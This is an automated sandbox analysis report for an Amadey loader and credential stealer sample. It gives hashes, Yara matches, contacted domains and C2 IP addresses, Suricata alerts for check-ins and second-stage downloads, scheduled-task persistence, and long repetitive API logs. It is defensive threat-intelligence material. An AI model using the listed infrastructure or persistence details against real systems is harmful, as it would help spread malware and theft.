popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

saiwer.exe

Trojan_PWS_Stealer Credential User Data Generic Malware SQLite Cookie Malicious Library UPX Malicious Packer Anti_VM PWS AntiDebug PNG Format PE File DLL OS Processor Check JPEG Format PE32 .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 8, 2022, 10:31 a.m. Dec. 8, 2022, 10:52 a.m.
Size 241.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 369321f33d5ffaeeadb4da9f33c78156
SHA256 5c5db333e1a7ce5e55ffa3aca2858d8e431e6e1fc0dae0ca508c6081819828dd
CRC32 34D57A14
ssdeep 6144:nlvsfCqKGsJzgVvk/JUfL6pWnqujpiBLI89Xu:lkKpJI6pFujpiVFu
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Malicious_Packer_Zero - Malicious Packer
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
iplogger.org
A 148.251.234.83
148.251.234.83
transfer.sh
A 144.76.136.153
144.76.136.153
www.aculpainting.com
A 23.160.193.16
23.160.193.16
www.icodeps.com
A 149.28.253.196
149.28.253.196
IP Address Status Action
144.76.136.153 Active Moloch
148.251.234.83 Active Moloch
149.28.253.196 Active Moloch
164.124.101.2 Active Moloch
185.106.92.214 Active Moloch
23.160.193.16 Active Moloch
31.41.244.14 Active Moloch
31.41.244.188 Active Moloch
31.41.244.237 Active Moloch
31.41.244.253 Active Moloch
62.204.41.6 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49171 -> 31.41.244.237:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.103:49173 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49184 -> 31.41.244.188:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.188:80 -> 192.168.56.103:49184 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2402000 ET DROP Dshield Block Listed Source group 1 Misc Attack
TCP 192.168.56.103:49187 -> 62.204.41.6:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.103:49187 -> 62.204.41.6:80 2017598 ET MALWARE Possible Kelihos.F EXE Download Common Structure A Network Trojan was detected
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49187 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 62.204.41.6:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 23.160.193.16:80 -> 192.168.56.103:49193 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 23.160.193.16:80 -> 192.168.56.103:49193 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
UDP 192.168.56.103:64894 -> 164.124.101.2:53 2035948 ET POLICY IP Check Domain (iplogger .org in DNS Lookup) Potential Corporate Privacy Violation
TCP 192.168.56.103:49197 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49197 -> 148.251.234.83:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49197 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49198 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49198 -> 148.251.234.83:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49198 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49197 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation
TCP 192.168.56.103:49203 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
UDP 192.168.56.103:53673 -> 164.124.101.2:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:53673 -> 164.124.101.2:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49210 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49210 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49215 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49215 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49210 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49215 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49214 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49214 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49211 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49214 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49211 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49211 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49179 -> 31.41.244.237:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 192.168.56.103:49226 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49226 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49226 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 144.76.136.153:443 -> 192.168.56.103:49228 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 31.41.244.237:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.237:80 -> 192.168.56.103:49179 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49203 -> 31.41.244.253:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 31.41.244.253:80 -> 192.168.56.103:49203 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 62.204.41.6:80 2027250 ET INFO Dotted Quad Host DLL Request Potentially Bad Traffic
TCP 62.204.41.6:80 -> 192.168.56.103:49190 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 62.204.41.6:80 -> 192.168.56.103:49190 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.168.56.103:49196 -> 149.28.253.196:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:53673 -> 8.8.8.8:53 2034316 ET POLICY Observed DNS Query to File Transfer Service Domain (transfer .sh) Potentially Bad Traffic
UDP 192.168.56.103:53673 -> 8.8.8.8:53 2035139 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in DNS Lookup) Misc activity
TCP 192.168.56.103:49225 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49225 -> 144.76.136.153:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49225 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 148.251.234.83:443 -> 192.168.56.103:49199 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49212 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 144.76.136.153:443 -> 192.168.56.103:49216 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49215 -> 144.76.136.153:443 2035145 ET INFO Commonly Abused File Sharing Site Domain Observed (transfer .sh in TLS SNI) Misc activity
TCP 192.168.56.103:49197 -> 148.251.234.83:443 2035949 ET POLICY IP Check Domain (iplogger .org in TLS SNI) Potential Corporate Privacy Violation

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49196
149.28.253.196:443 		C=CN, O=TrustAsia Technologies, Inc., CN=TrustAsia RSA DV TLS CA G2 CN=icodeps.com 87:db:69:7b:62:f3:12:4a:c6:40:1e:05:07:04:95:6d:41:8c:f8:26

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: SUCCESS: The scheduled task "gntuud.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\test22\AppData\Local\Temp\9c69749b54\gntuud.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: r
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004339a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004339a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004338a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004338a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004338a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004338a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x004338a0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433b20
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00434220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00434220
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00433f60
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfc88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfc88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfc88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfc88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfc88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dfd48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003dff48
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003e0688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003e0688
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x003e0548
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fcf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fc78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fc78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fc78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fc78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fc78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061fd38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0061ff38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00620638
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00620638
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\InstallLocation
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0xb03d04
0xb03c26
0xb024dd
0xb020b6
0xb005a0
0xb0006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71fe2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x71ff264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x71ff2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x720a74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x720a7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72131dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72131e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72131f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7213416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72a3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 c8 8b 45 c8 89 45 c4
exception.instruction: mov eax, dword ptr [ecx]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb03df8
registers.esp: 1503128
registers.edi: 1503180
registers.eax: 0
registers.ebp: 1503192
registers.edx: 4287648
registers.ebx: 1504076
registers.esi: 38795740
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72191194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72062ba1
mscorlib+0x36dd51 @ 0x7138dd51
mscorlib+0x32fea6 @ 0x7134fea6
mscorlib+0x30ab40 @ 0x7132ab40
0xb0e54a
0xb0e3fe
0xb0db79
0xb0cf9e
0xb07c87
0xb025a5
0xb020b6
0xb005a0
0xb0006c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x71fe2652
